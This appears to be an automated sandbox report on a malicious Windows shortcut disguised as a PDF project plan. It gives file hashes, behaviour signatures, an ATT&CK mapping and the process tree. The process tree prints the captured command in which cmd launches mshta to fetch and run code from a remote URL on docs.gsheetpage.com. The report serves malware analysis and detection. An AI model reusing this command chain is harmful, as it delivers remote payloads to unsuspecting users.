Overview

overview

8

Static

static

4

Exchange P...df.lnk

windows7_x64

8

Exchange P...df.lnk

windows10_x64

8

Analysis

  • max time kernel
    110s
  • max time network
    118s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    29-10-2021 05:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Exchange Project Management Plan_Q3.2021.pdf.lnk

  • Size

    1.3MB

  • MD5

    4b9366f2dcab60d56d09e69e21d77d91

  • SHA1

    a46318a25582c2616f33f49f7af986137637ba1d

  • SHA256

    51eaf8af57211f8d9e534f98413e71f4ddf5abcce806a111fc49a30d3bcec696

  • SHA512

    4b1bdfe4d09ed047122824536e5a1f59d533c8e1780a2cbab84398a8a1ba838de916ca99234b055a49e956d9fc539a961665764a3b89dc0d6736b8d6ce1b5d04

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Exchange Project Management Plan_Q3.2021.pdf.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://docs.gsheetpage.com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2852
      • C:\Windows\System32\mshta.exe
        C:\Windows\System32\mshta https://docs.gsheetpage.com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI=
        3⤵
        • Blocklisted process makes network request
        PID:3508

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2852-118-0x0000000000000000-mapping.dmp
    Download
  • memory/3508-119-0x0000000000000000-mapping.dmp
    Download
  • memory/3508-120-0x0000020C34B68000-0x0000020C34B70000-memory.dmp
    Filesize

    32KB

    Download